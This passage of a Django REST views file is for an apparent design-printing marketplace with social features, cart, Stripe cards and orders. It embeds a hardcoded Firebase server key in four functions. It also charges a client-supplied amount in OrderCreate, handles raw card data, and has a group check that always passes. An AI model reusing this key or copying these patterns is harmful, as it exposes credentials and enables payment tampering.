return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
follow_to_id = received_json_data['follow_to']
user1 = User.objects.get(id=follow_to_id)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
follow_status = int(received_json_data['follow_status'])
if follow_status == 1:
follow = FollowUser.objects.filter(follow_by_id= user.id,follow_to_id = user1.id)
if not follow.exists():
follow = FollowUser.objects.create(follow_by_id = user.id,follow_to_id = user1.id)
total_follower = user1.total_follower
User.objects.filter(id = user1.id).update(total_follower = total_follower+1)
total_following = user.total_following
User.objects.filter(id = user.id).update(total_following = total_following+1)
if user1.onoffnotification == 1:
notobj = Notification.objects.create(id = uuid.uuid1(),
receiver_id = follow_to_id,
sender_id = user.id,
message = "has followed you",
tag = "follow",
notification_time = nowTime,
table_id = follow.id)
try:
Token.objects.get(user_id=follow_to_id)
notificationObj = SendSetFollowNotification(receiverId=follow_to_id,senderId=user.id,title="notification",message= str(user.fullname) + "has followed you",tag = "follow",table_id = follow.id)
return Response({"status": "1", 'message': "set User Following"},status=status.HTTP_200_OK)
except:
return Response({"status": "1", 'message': "set User Following"},status=status.HTTP_200_OK)
else:
return Response({"message": "already in following list", "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
elif follow_status == 0:
follow = FollowUser.objects.filter(follow_by_id= user.id,follow_to_id = user1.id)
if follow.exists():
follow.delete()
total_follower = user1.total_follower
User.objects.filter(id = user1.id).update(total_follower = total_follower-1)
total_following = user.total_following
User.objects.filter(id = user.id).update(total_following = total_following-1)
return Response({"status": "1", 'message': "unfollowed sucessfully"},status=status.HTTP_200_OK)
else:
return Response({"message": "Already not in followlist ", "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=========================================================
# Get user followers
#=========================================================
@AppVersion_required
@api_view(['POST'])
def getFollowers(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# page_num = request.GET['page_num']
user_id = received_json_data['user_id']
follower = FollowUser.objects.select_related('follow_by').filter(follow_to_id = user_id)
# paginator = Paginator(follower, 4)
# try:
# follower = paginator.page(page_num)
# except:
# follower = None
if follower:
followserializer = FollowUserSerializer(follower,many=True)
followserializer_data = followserializer.data
for data in followserializer_data:
obj = User.objects.get(id=data['follow_by'])
data['fullname'] = obj.fullname
data['image'] = obj.image
data['user_name'] = obj.user_name
following = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id =data['follow_by'])
if following:
data["follow_status"] = True
else:
data["follow_status"] = False
return Response({"data":followserializer_data}, status=status.HTTP_200_OK)
else:
return Response({"data" : []}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#====================================================================
#Get user Following
#====================================================================
@AppVersion_required
@api_view(['POST'])
def getFollowing(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# page_num = request.GET['page_num']
user_id = received_json_data['user_id']
follower = FollowUser.objects.select_related('follow_to').filter(follow_by_id = user_id)
# paginator = Paginator(follower, 4)
# try:
# follower = paginator.page(page_num)
# except:
# follower = None
temp=[]
if follower:
followserializer = FollowUserSerializer(follower,many=True)
followserializer_data = followserializer.data
for data in followserializer_data:
obj = User.objects.get(id=data['follow_to'])
data['fullname'] = obj.fullname
data['image'] = obj.image
data['user_name'] = obj.user_name
following = FollowUser.objects.filter(follow_by_id = user.id, follow_to_id =data['follow_to'])
if following:
temp.append(following)
data["follow_status"] = True
else:
data["follow_status"] = False
return Response({"data":followserializer_data}, status=status.HTTP_200_OK)
else:
return Response({"data" : []}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================================
#get User home page
#======================================================
@AppVersion_required
@api_view(['GET'])
def getHomePage(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
if request.META.get('HTTP_AUTHORIZATION') == None:
bnk_detail = {}
page_num = request.GET['page_num']
post = Post.objects.filter(post_status=1).order_by('-created_time')
paginator = Paginator(post, 20)
try:
post = paginator.page(page_num)
except:
post = None
if post is not None:
post_data = PostSerializer(post,many=True).data
for data in post_data:
data['post_like'] = False
obj = User.objects.get(id=data['user'])
data['post_fav'] = False
postimages = PostImage.objects.values('post_images').filter(post_id = data['id'])
temp=[]
for i in postimages:
temp.append(i['post_images'])
data['post_image'] = temp
data['fullname'] = obj.fullname
data['image'] = obj.image
return Response({"message" :"success",'has_next': post.has_next(),"cart_count": 0,"data":post_data,"bank_detail":bnk_detail}, status=status.HTTP_200_OK)
else:
return Response({"data": []}, status=status.HTTP_200_OK)
else:
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
print(API_key)
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
# followed_people = FollowUser.objects.filter(follow_to_id = user.id).values('follow_by')
# following_people = FollowUser.objects.filter(follow_by_id = user.id).values('follow_to')
# a = Post.objects.filter(Q(user__in=followed_people) or Q(user__in=following_people)).order_by('-created_time')
try:
bnkdetail = BankDetail.objects.filter(user_id=user.id)
print(bnkdetail)
if bnkdetail is not None:
detailserializer = BankDetailSerializer(bnkdetail,many=True)
bnk_detail = detailserializer.data[0]
except:
bnk_detail = {}
page_num = request.GET['page_num']
post = Post.objects.filter(post_status=1).exclude(user_id = user.id).order_by('-created_time')
paginator = Paginator(post, 20)
try:
post = paginator.page(page_num)
except:
post = None
if post is not None:
post_data = PostSerializer(post,many=True).data
for data in post_data:
post_like = PostLike.objects.filter(user_id = user.id,post_id = data['id'])
if post_like:
data['post_like'] = True
else:
data['post_like'] = False
post_fav = Favourite.objects.filter(user_id = user.id , post_id = data['id'])
obj = User.objects.get(id=data['user'])
# data['cart_count'] = obj.cartNo
print(post_fav)
if post_fav:
data['post_fav'] = True
else:
data['post_fav'] = False
postimages = PostImage.objects.values('post_images').filter(post_id = data['id'])
temp=[]
for i in postimages:
temp.append(i['post_images'])
data['post_image'] = temp
data['fullname'] = obj.fullname
data['image'] = obj.image
obj2= User.objects.get(id=user.id)
return Response({"message" :"success",'has_next': post.has_next(),"data":post_data,"cart_count":obj2.cartNo, "login_type":user.login_type,"bank_detail":bnk_detail}, status=status.HTTP_200_OK)
else:
return Response({"data": []}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# Set user On Off notification
#=================================================
@AppVersion_required
@api_view(['POST'])
def SetOnOffNotification(request):
try:
with transaction.atomic():
try:
received_json_data = json.loads(request.body, strict=False)
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
user = User.objects.get(id=user.id)
onoffnotification = received_json_data['notificationStatus']
notificationUpdate = User.objects.filter(id=user.id).update(onoffnotification=onoffnotification)
if notificationUpdate:
if int(onoffnotification):
return Response({"message": "Notification successfully on", "status": "1",
"notificationStatus": int(onoffnotification)}, status=status.HTTP_200_OK)
else:
return Response({"message": "Notification successfully off", "status": "1",
"notificationStatus": int(onoffnotification)}, status=status.HTTP_200_OK)
else:
return Response({"message": errorMessage, "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=======================================================
#method to send notificationi like dislike
#======================================================
def SendNotification(senderId, receiverId,title,message,tag,table_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiverId)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = message
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": message,
"post_id":table_id,
"tag":tag,
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound ="default",message_body=message_body, data_message=data_message)
# if result is not None:
# return True
# print("**********")
# else:
# return False
# print("###########")
#else:
# return False
except Exception as e:
return False
#===================================
# send notification order place
#===================================
def SendOrderNotification(senderId, receiverId,title,message,tag,order_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiverId)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = message
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": message,
"order_id":order_id,
"tag":tag,
# "order_id":order_id,
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound="default",message_body=message_body, data_message=data_message)
#return True
#print("**********")
# else:
# return False
# print("###########")
#else:
# return False
except Exception as e:
return False
#=======================================
# send notidfication for chat
#=========================================
def SendChatNotification(sender_id,sender_name,sender_image,receiver_id,receiver_fullname,receiver_image,created_time,message,title):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
print(receiver_id,"iid")
receiver = User.objects.get(id=receiver_id)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message = message.encode("latin_1")
print(message)
message_body = (message.decode("raw_unicode_escape").encode('utf-16', 'surrogatepass').decode('utf-16'))
print(message_body)
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": message_body,
"sender_id": sender_id,
"sender_name": sender_name,
"receiver_id": receiver_id,
"receiver_name": receiver_fullname,
"tag":"message",
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound="default",message_body=message_body, data_message=data_message)
if result is not None:
return True
else:
return False
except Exception as e:
return False
#=============================================
# method for accept notification
#=============================================
def SendAcceptOrderNotification(order_id,title,tag,sender_id,receiver_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiver_id)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = title
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": "Accepted your Order",
"sender_id": sender_id,
"receiver_id": receiver_id,
"tag":tag,
"order_id":order_id
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound="default",message_body="Accepted your Order", data_message=data_message)
if result is not None:
return True
else:
return False
except Exception as e:
return False
#==================================
#likedislike
#=================================
@AppVersion_required
@csrf_exempt
@api_view(['POST'])
def LikedislikePost(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
api_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=api_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
like_status = int(received_json_data['like_status'])
post= Post.objects.get(id = post_id,post_status = 1)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
if like_status == 1:
post_like = PostLike.objects.filter(user_id = user.id,post_id = post.id)
if not post_like.exists():
post_like = PostLike.objects.create(user_id = user.id,post_id = post.id)
total_likes = post.total_likes
Post.objects.filter(id = post.id).update(total_likes = total_likes+1)
a = post.user
if user.id !=post.user_id:
if a.onoffnotification == 1:
noti = Notification.objects.create(id = uuid.uuid1(),
receiver_id = post.user_id,
sender_id = user.id,
message = "liked your post",
tag = "like" ,
notification_time = nowTime,
table_id = post.id)
try:
Token.objects.get(user_id=post.user_id)
notify = SendNotification(user.id,post.user_id,"notification", str(user.fullname) + " liked your post","like" ,str(post.id))
return Response({'message': PostLikedMessage},status=status.HTTP_200_OK)
except:
return Response({'message': PostLikedMessage},status=status.HTTP_200_OK)
else:
print("nononononono")
return Response({'message': PostLikedMessage},status=status.HTTP_200_OK)
else:
return Response({"message": "Post already liked"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
elif like_status==0:
post_dislike = PostLike.objects.filter(user_id=user.id,post_id=post.id)
if post_dislike.exists():
post_dislike.delete()
total_likes = post.total_likes
Post.objects.filter(id = post.id).update(total_likes = total_likes-1)
return Response({"status": "1", 'message': PostDislikedMessage},
status=status.HTTP_200_OK)
else:
return Response({"message": "Already not liked "},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": "This post has been disabled by admin"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : "This post has been disabled by admin"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#================================================
# Add post into cart
#================================================
@AppVersion_required
@api_view(['POST'])
def AddToCart(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
check_group = user.groups.filter(name='User').exists()
if check_group == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
print(traceback.format_exc())
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
post_images = received_json_data['image_id']
size_id = received_json_data['size_id']
try:
post = Post.objects.get(id=post_id,post_status=1)
if post.post_type=="custom":
post_image = PostImage.objects.get(post =post.id, id = post_images)
sizes = Size.objects.get(id=size_id)
#cart = Cart.objects.filter(post_id=post, user_id= user.id, size_id = sizes, post_images_id = post_image)
cart = Cart.objects.filter(post_id=post, user_id= user.id, size_id = sizes)
c = User.objects.get(id = user.id)
else:
post_image = PostImage.objects.get(post =post.id, id = post_images)
sizes = Size.objects.get(id=size_id)
cart = Cart.objects.filter(post_id=post, user_id= user.id, size_id = sizes, post_images_id = post_image)
c = User.objects.get(id = user.id)
if not cart.exists():
a = Cart.objects.create(
size_id = sizes.id,
user_id=user.id,
post_id=post.id,
post_images_id = post_image.id,
price = post.price,)
if a:
cartNo = user.cartNo
User.objects.filter(id = user.id).update(cartNo = cartNo+1)
b = User.objects.get(id = user.id)
else:
pass
return Response({"message": addCartSuccessMessage, "status": "1", "cartCount": b.cartNo}, status=status.HTTP_200_OK)
else:
return Response({"message": "Item is already in your cart","cartCount": c.cartNo},status=status.HTTP_200_OK)
except:
return Response({"message" : "This post has been disabled by admin"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==============================================
# Get posts from cart
#==============================================
@AppVersion_required
@api_view(['GET'])
def ShowCartPosts(request):
try:
with transaction.atomic():
# received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
service_tax = 6.00
shipping_cost = 4.99
cart1 = Cart.objects.filter(user = user.id).order_by('-created_time')
if cart1:
cart1serializer = CartSerializer(cart1,many=True)
cart_data = cart1serializer.data
for data in cart_data:
post = Post.objects.get(id = data['post'])
if post.post_type=="custom":
price = post.price
obj1 = Size.objects.get(id = data['size'])
obj2 = PostImage.objects.get(id = data['post_images'])
obj3 = PostImage.objects.filter(post_id=data['post'])
temp=[]
for i in obj3:
temp.append(i.post_images)
data['post_image'] = temp
data['colour_name'] = "Black"
data['post_description'] = post.post_description
data['price'] = str(price)
data['design_by'] = post.user.fullname
data['size_name'] = obj1.size
data['post_printing_size_front'] = post.post_printing_size_front
data['post_printing_size_back'] = post.post_printing_size_back
else:
price = post.price
obj1 = Size.objects.get(id = data['size'])
obj2 = PostImage.objects.get(id = data['post_images'])
obj3 = PostImage.objects.filter(id = data['post_images'])
temp1=[]
for i in obj3:
temp1.append(i.post_images)
data['post_image'] = temp1
data['colour_name'] = "Black"
data['post_description'] = post.post_description
data['price'] = str(price)
data['design_by'] = post.user.fullname
data['size_name'] = obj1.size
data['post_printing_size_front'] = post.post_printing_size_front
data['post_printing_size_back'] = post.post_printing_size_back
if cart_data:
last_ad = OrderTrn.objects.filter(user_id = user.id).order_by('-transaction_time').first()
if last_ad:
add1 = Addresses.objects.filter(id = last_ad.address.id,status=1)
if add1:
add = Addresses.objects.filter(id = last_ad.address.id,status=1).values("id","first_name","last_name","phone","city","postal_code","address")
if add:
is_default = True
else:
is_default = False
return Response({"message" : "Items fetched successfully","data":cart_data,"address_name":add[0], "default_address":is_default,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Items fetched successfully","data":cart_data, "address_name":{}, "default_address":False,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Items fetched successfully","data":cart_data, "address_name":{}, "default_address":False,"serviceCharge":service_tax,"shippingCost":shipping_cost}, status=status.HTTP_200_OK)
else:
return Response({"data": [], "address_name":{}, "default_address":False,"serviceCharge":0.00,"shippingCost":0.00}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================================
# Delete post from cart
#=============================================================
@AppVersion_required
@api_view(['POST'])
def DeletePostFromCart(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status":jsonCards},status=status.HTTP_401_UNAUTHORIZED)
cart_id = request.data['cart_id']
cart = Cart.objects.get(id=cart_id,user_id = user.id)
if cart:
cart = Cart.objects.filter(id=cart.id).delete()
cartNo = user.cartNo
User.objects.filter(id = user.id).update(cartNo = cartNo-1)
return Response({"message": deleteSuccessMessage},status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
#Add Card
#======================================
@AppVersion_required
@api_view(['POST'])
def AddCard(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
except:
return Response({"message" : "Session expired!! please login again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
checkGroup = user.groups.filter(name='User').exists()
if checkGroup:
stripe.api_key = settings.STRIPE_SECRET_KEY
cardNumber = request.data['cardNumber']
expMonth = request.data['expMonth']
expYear = request.data['expYear']
cvc = request.data["cvc"]
name = request.data["name"]
if user.stripe_id == "":
try:
tokenDetails = stripe.Token.create(
card={
"number": cardNumber,
"exp_month": expMonth,
"exp_year": expYear,
"cvc": cvc,
"name": name,
},
)
token_id = tokenDetails.id
response = stripe.Customer.create(
description = "Customer_" +str(user.id),
email = str(user.email))
StripeId = response.id
User.objects.filter(id=user.id).update(stripe_id = StripeId)
u1 = User.objects.get(id = user.id)
cardDetails = stripe.Customer.create_source(u1.stripe_id,source=token_id)
cardJson = json.loads(str(cardDetails))
if cardJson['brand'] == "MasterCard":
cardJson['card_image'] = '/static/images/ic_master.png'
elif cardJson['brand'] == "Visa":
cardJson['card_image'] = '/static/images/ic_visa.png'
elif cardJson['brand'] == "Diners Club":
cardJson['card_image'] = '/static/images/Diners-Club.png'
elif cardJson['brand'] == "Discover":
cardJson['card_image'] = '/static/images/discover.png'
elif cardJson['brand'] == "American Express":
cardJson['card_image'] = '/static/images/american_express.png'
else:
cardJson['card_image'] = '/static/images/jbc.png'
cardJson['message'] = addSuccessMessage
return Response(cardJson,status=status.HTTP_200_OK)
except Exception as e2:
message2 = str(e2)
return Response({"message":message2.split(":")[1] , "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
try:
tokenDetails = stripe.Token.create(
card={
"number": cardNumber,
"exp_month": expMonth,
"exp_year": expYear,
"cvc": cvc,
"name": name,
},
)
token_id = tokenDetails.id
cardDetails = stripe.Customer.create_source(user.stripe_id,source=token_id)
cardJson = json.loads(str(cardDetails))
if cardJson['brand'] == "MasterCard":
cardJson['card_image'] = '/static/images/american_express.png'
elif cardJson['brand'] == "Visa":
cardJson['card_image'] = '/static/images/ic_visa.png'
elif cardJson['brand'] == "Diners Club":
cardJson['card_image'] = '/static/images/Diners-Club.png'
elif cardJson['brand'] == "Discover":
cardJson['card_image'] = '/static/images/discover.png'
elif cardJson['brand'] == "American Express":
cardJson['card_image'] = '/static/images/american_express.png'
else:
cardJson['card_image'] = '/static/images/jbc.png'
cardJson['message'] = addSuccessMessage
return Response(cardJson,status=status.HTTP_200_OK)
except Exception as e2:
message2 = str(e2)
return Response({"message":message2.split(":")[1] , "status": "0"},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['GET'])
def Get_List_Cards(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
check_group = user.groups.filter(name='User').exists
except:
return Response({'message' : "Session expired! Please login again","status":"0"},status=status.HTTP_401_UNAUTHORIZED)
if check_group:
stripe.api_key = settings.STRIPE_SECRET_KEY
if user.stripe_id:
try:
list = stripe.Customer.retrieve(user.stripe_id).sources.list(limit=4,
object='card')
cust_json = json.loads(str(list))
jsonCards = cust_json['data']
for key in jsonCards:
if key['brand'] == "MasterCard":
key['card_image'] = '/static/images/american_express.png'
elif key['brand'] == "Visa":
key['card_image'] = '/static/images/ic_visa.png'
elif key['brand'] == "Diners Club":
key['card_image'] = '/static/images/Diners-Club.png'
elif key['brand'] == "Discover":
key['card_image'] = '/static/images/discover.png'
elif key['brand'] == "American Express":
key['card_image'] = '/static/images/american_express.png'
else:
key['card_image'] = '/static/images/jbc.png'
return Response({'message':'card list is here', 'cards' : jsonCards}, status=status.HTTP_200_OK)
except stripe.error.CardError as e:
return Response({"message": str(e), 'cards' : []}, status = status.HTTP_200_OK)
else:
return Response({"message": "Sorry you have no cards."}, status = status.HTTP_200_OK)
else:
return Response({"message" : errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
@AppVersion_required
@api_view(['POST'])
def DeleteCard(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='User').exists()
except:
return Response({"message": "Session expired!! please login again"},status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
Obj = User.objects.get(id=user.id)
stripe.api_key = settings.STRIPE_SECRET_KEY
cardId = request.data["card_id"]
if Obj.stripe_id != "":
try:
user1 = stripe.Customer.retrieve(Obj.stripe_id)
deleted = user1.sources.retrieve(cardId).delete()
return Response({'message': "Deleted successfully"},status=status.HTTP_200_OK)
except Exception as e:
return Response({"message": str(e)},
status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response(
{'message': 'User has no cards yet or no stripe id attached.'},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message": errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e1:
print(traceback.format_exc())
return Response({"message": str(e1)}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#==========================================================
#Payment and Order Creation
#==========================================================
from decimal import *
@AppVersion_required
@api_view(['POST'])
def OrderCreate(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
print("user", user.id)
except:
return Response({'message' : "Session expired! Please login again","status":"0"},status=status.HTTP_401_UNAUTHORIZED)
stripe.api_key = settings.STRIPE_SECRET_KEY
li = []
card = request.data['card']
am = request.data['amt']
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
charge = stripe.Charge.create(
amount= int(am)*100,
currency='usd',
source=card,
customer= user.stripe_id
)
address_id = request.data['address_id']
aa = Addresses.objects.get(user=user.id, id=address_id)
customer_json = json.loads(str(charge))
if customer_json['status'] == "succeeded":
TransactionId = customer_json['id']
order = OrderTrn.objects.create(total_amount = am,
transaction_id = TransactionId,
order_status = "PLACED",
address_id = aa.id,
user_id = user.id)
if order:
cartobjs = Cart.objects.filter(user_id=user.id)
if cartobjs:
for data in cartobjs:
ordpost = OrderPost.objects.create(
post_id = data.post_id,
size = data.size,
price = data.price,
order_status = ORDER_STATUS_PENDING,
post_images_id = data.post_images.id,
order_id = order.id,
user_id = user.id)
obj1 = Post.objects.get(id = ordpost.post_id)###post object
obj2 = obj1.user_id ####seller id
li.append(obj2)
lii = list(dict.fromkeys(li))
print(li)
for e in lii:
obj3 = User.objects.get(id = e)#########user object
obj4 = obj3.onoffnotification
if obj3.onoffnotification == 1:
notificationObj = Notification.objects.create(id=uuid.uuid1(),
receiver_id=e,
notification_time = nowTime,
sender_id=user.id,
message= " has placed an order",
tag = "order place",
table_id = obj1.id,
order_id = ordpost.id)
recv_status = Token.objects.filter(user_id=e).exists()
if recv_status == True:
nott = SendOrderNotification(user.id,e,"notification", str(user.fullname) + " has placed an order", "Order place" , str(ordpost.id))
else:
pass
cart = Cart.objects.filter(user_id=user.id).delete()
User.objects.filter(id = user.id).update(cartNo = 0)
else:
print("empty cart")
pass
Details={"paymentFrom":card,
"amountpaid": am,
"transaction_id": order.transaction_id,
"transaction_time":order.transaction_time,
"order_id": order.id,
"transactionstatus":1,
}
return Response({'message':'Payment Successfull, Order has been created', 'payment': Details}, status=status.HTTP_200_OK)
else:
return Response({"status": "0", 'message':errorMessage}, status=status.HTTP_401_UNAUTHORIZED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except Exception as e:
print(traceback.format_exc())
return Response({"message": errorMessage, "status": "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
# posts = Post.objects.filter(user_id=user.id,post_status=1)
# post1 = PostImage.objects.values('post_images').filter(post_id__in = posts)
#==================================================
